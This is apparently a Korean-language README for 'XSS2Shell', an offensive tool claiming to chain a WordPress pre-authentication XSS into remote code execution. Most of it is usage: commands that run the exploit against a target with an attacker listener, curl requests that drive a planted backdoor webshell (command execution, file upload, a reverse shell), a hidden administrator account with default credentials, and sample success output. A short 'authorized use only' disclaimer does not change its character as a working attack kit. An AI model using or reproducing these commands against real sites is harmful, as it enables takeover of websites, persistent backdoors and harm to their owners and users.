
WordPress 사전 인증 XSS(CVE-2026-64638)를 악용하여 원격 코드 실행을 달성하고, 지속성, 파일 업로드, 리버스 셸 및 스텔스 옵션을 갖춘 AES 암호화 백도어 웹쉘을 설치합니다. 승인된 레드팀 모의 침투 테스트를 위한 도구입니다.
WordPress 사전 인증(Pre-Auth) XSS → RCE 체인 익스플로잇
개발자: G0D150NE
# 클론
git clone https://github.com/g0d150ne/XSS2Shell.git
cd XSS2Shell
# 의존성 설치
pip3 install requests beautifulsoup4 cryptography
# 실행
python3 poc.py -h
# 리버스 셸용 터미널 열기
nc -lvnp 4444
자동 모드 (권장)
python3 poc.py http://target.com -u admin -p pass123 --lhost 192.168.1.100
XSS 모드 (자격 증명 없음)
python3 poc.py http://target.com --mode xss --lhost 192.168.1.100
직접 모드 (자격 증명 사용)
python3 poc.py http://target.com -u admin -p pass123 --mode direct --lhost 192.168.1.100
웹셸 설치 후:
# Base64 인코딩 (권장)
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?b2h='$(echo -n 'id' | base64)
# 일반 명령
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?cmd=whoami'
# 파일 업로드
curl -F '[email protected]' http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
# 리버스 셸
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?rev=1'
# 1. 자동 스캔 + 익스플로잇
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5
# 2. 자격 증명 없는 XSS 체인
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5
# 3. 사용자 지정 포트 및 플러그인 이름
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --lport 1337 --slug backdoor
# 4. 백도어 비밀번호 변경
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --backdoor-pass MySecretPass
# 5. 사용자 지정 콜백 포트
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5 --callback-port 9999
익스플로잇 성공 후:
생성된 숨은 관리자:
sysadmin_{slug}{backdoor-pass} (기본값: G0D150NE)╔══════════════════════════════════════════════════════════════════╗
║ Target : http://wordpress-site.com
║ Attacker : 192.168.1.100:4444
║ Plugin : g0d150ne
║ Mode : AUTO
╚══════════════════════════════════════════════════════════════════╝
[•] Detecting WordPress version...
[+] WordPress version: 6.7.0
[•] Testing XSS vulnerability...
[+] XSS vulnerable! Vector: <area id=ajaxurl...
[+] Login successful as admin
[+] Plugin uploaded successfully
[+] Webshell ready: http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
[+] Test: uid=33(www-data)
╔══════════════════════════════════════════════════════════════════╗
║ [+] EXPLOIT SUCCESSFUL ║
╠══════════════════════════════════════════════════════════════════╣
║ WEBSHELL: ║
║ http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php ║
║ ADMIN USER CREATED: ║
║ Username: sysadmin_g0d150ne ║
║ Password: G0D150NE ║
╚══════════════════════════════════════════════════════════════════╝
교육 및 인가된 테스트 용도로만 사용하십시오.
소유한 시스템 또는 명시적 테스트 허가를 받은 시스템에서만 사용하십시오.
저자는 오용 또는 피해에 대해 책임을 지지 않습니다.
| 옵션 | 설명 | 기본값 |
|---|
target | 대상 WordPress URL | 필수 |
-u, --username | WordPress 관리자 사용자명 | - |
-p, --wp-pass | WordPress 관리자 비밀번호 | - |
--lhost | 리스너 IP 주소 | 127.0.0.1 |
--lport | 리스너 포트 | 4444 |
--mode | 익스플로잇 모드 (auto/xss/direct) | auto |
--slug | 플러그인 슬러그 이름 | g0d150ne |
--callback-port | 콜백 서버 포트 | 9090 |
--backdoor-pass | 백도어 비밀번호 | G0D150NE |
| 기능 | 명령 |
|---|
| 명령 실행 | ?b2h=BASE64_CMD |
| 파일 업로드 | -F '[email protected]' |
| 리버스 셸 | ?rev=1 |
| 일반 명령 | ?cmd=id |
| 암호화 백도어 | ?decrypt=AES_DATA |
| 문제 | 해결 방법 |
|---|
ModuleNotFoundError | pip3 install requests beautifulsoup4 cryptography |
Connection refused | 리스너 확인: nc -lvnp 4444 |
Login failed | 자격 증명 확인 또는 XSS 모드 사용 |
Plugin upload failed | 권한 확인, 다른 slug 사용 |
Argument conflict | wp-pass에는 -p, 백도어에는 --backdoor-pass 사용 |